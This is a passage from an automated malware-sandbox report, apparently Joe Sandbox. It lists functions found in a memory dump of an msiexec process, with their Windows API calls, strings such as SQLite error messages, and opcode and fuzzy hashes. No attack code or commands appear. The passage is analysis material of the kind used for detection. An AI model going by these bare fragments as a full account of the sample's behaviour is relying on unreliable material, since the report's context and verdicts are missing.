                                                                                                        • GetParent.USER32(?), ref: 00409FA5
                                                                                                        • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                        • String ID:
                                                                                                        • API String ID: 2163313125-0
                                                                                                        • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                        • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                                        • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                        • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                                        Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: free$wcslen
                                                                                                        • String ID:
                                                                                                        • API String ID: 3592753638-3916222277
                                                                                                        • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                                        • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                        • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                                        • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                        Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040A47B
                                                                                                        • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                        • wcslen.MSVCRT ref: 0040A4BA
                                                                                                        • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                        • wcslen.MSVCRT ref: 0040A4E0
                                                                                                        • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpywcslen$_snwprintfmemset
                                                                                                        • String ID: %s (%s)$YV@
                                                                                                        • API String ID: 3979103747-598926743
                                                                                                        • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                        • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                        • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                        • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                        Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                        • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                        • wcslen.MSVCRT ref: 0040A6B1
                                                                                                        • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                        • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                        • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                        • String ID: Unknown Error$netmsg.dll
                                                                                                        • API String ID: 2767993716-572158859
                                                                                                        • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                        • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                        • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                        • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                        Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                        • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                        • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                        • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                          • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                        • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                        • API String ID: 3176057301-2039793938
                                                                                                        • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                        • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                        • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                        • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                        Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • unable to open database: %s, xrefs: 0042F84E
                                                                                                        • database %s is already in use, xrefs: 0042F6C5
                                                                                                        • out of memory, xrefs: 0042F865
                                                                                                        • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                        • database is already attached, xrefs: 0042F721
                                                                                                        • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                        • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpymemset
                                                                                                        • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                        • API String ID: 1297977491-2001300268
                                                                                                        • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                                        • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                        • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                                        • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                        Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EB3F
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 0040EB5B
                                                                                                        • memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
                                                                                                        • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC17
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 0040EC21
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC59
                                                                                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                          • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                          • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                          • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                          • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                        • String ID: ($d
                                                                                                        • API String ID: 1140211610-1915259565
                                                                                                        • Opcode ID: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                                                                        • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                        • Opcode Fuzzy Hash: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                                                                        • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                                        Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                        • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                        • GetLastError.KERNEL32 ref: 004178FB
                                                                                                        • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$ErrorLastLockSleepUnlock
                                                                                                        • String ID:
                                                                                                        • API String ID: 3015003838-0
                                                                                                        • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                        • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                        • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                        • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                        Function 00407E1E Relevance: 13.6, APIs: 9, Instructions: 115COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00407E44
                                                                                                        • memset.MSVCRT ref: 00407E5B
                                                                                                        • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                        • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                        • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                        • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                        • wcscpy.MSVCRT ref: 00407F10
                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 59245283-0
                                                                                                        • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                        • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                                        • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                        • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                        Function 00414E7F Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                                        • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                                        • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy
                                                                                                        • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                        • API String ID: 3510742995-3273207271
                                                                                                        • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                        • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                        • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                        • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                        Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                                        • memset.MSVCRT ref: 00413ADC
                                                                                                        • memset.MSVCRT ref: 00413AEC
                                                                                                          • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                        • memset.MSVCRT ref: 00413BD7
                                                                                                        • wcscpy.MSVCRT ref: 00413BF8
                                                                                                        • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                        • String ID: 3A
                                                                                                        • API String ID: 3300951397-293699754
                                                                                                        • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                        • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                        • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                        • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                        Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                        • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                          • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                          • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                        • wcslen.MSVCRT ref: 0040D1D3
                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                        • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                        • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                          • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                                          • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                                          • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                                          • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                        • String ID: strings
                                                                                                        • API String ID: 3166385802-3030018805
                                                                                                        • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                        • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                        • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                        • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                        Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0041249C
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                        • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                        • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                        • wcscpy.MSVCRT ref: 004125A0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                        • String ID: r!A
                                                                                                        • API String ID: 2791114272-628097481
                                                                                                        • Opcode ID: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                                                                        • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                        • Opcode Fuzzy Hash: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                                                                        • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                        Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                        • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                        • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                        • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                        • String ID: BIN
                                                                                                        • API String ID: 1668488027-1015027815
                                                                                                        • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                        • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                        • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                        • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                        Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00411AF6
                                                                                                          • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                        • wcsrchr.MSVCRT ref: 00411B14
                                                                                                        • wcscat.MSVCRT ref: 00411B2E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                        • String ID: AE$.cfg$General$EA
                                                                                                        • API String ID: 776488737-1622828088
                                                                                                        • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                        • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                        • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                        • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                        Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040D8BD
                                                                                                        • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                        • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                        • memset.MSVCRT ref: 0040D906
                                                                                                        • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                        • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                          • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                          • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                        • String ID: sysdatetimepick32
                                                                                                        • API String ID: 1028950076-4169760276
                                                                                                        • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                        • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                        • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                        • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                        Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                        • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                        • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                        • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                        • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                        • memset.MSVCRT ref: 0041BA3D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy$memset
                                                                                                        • String ID: -journal$-wal
                                                                                                        • API String ID: 438689982-2894717839
                                                                                                        • Opcode ID: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                                                        • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                        • Opcode Fuzzy Hash: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                                                        • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                        Function 00405B83 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
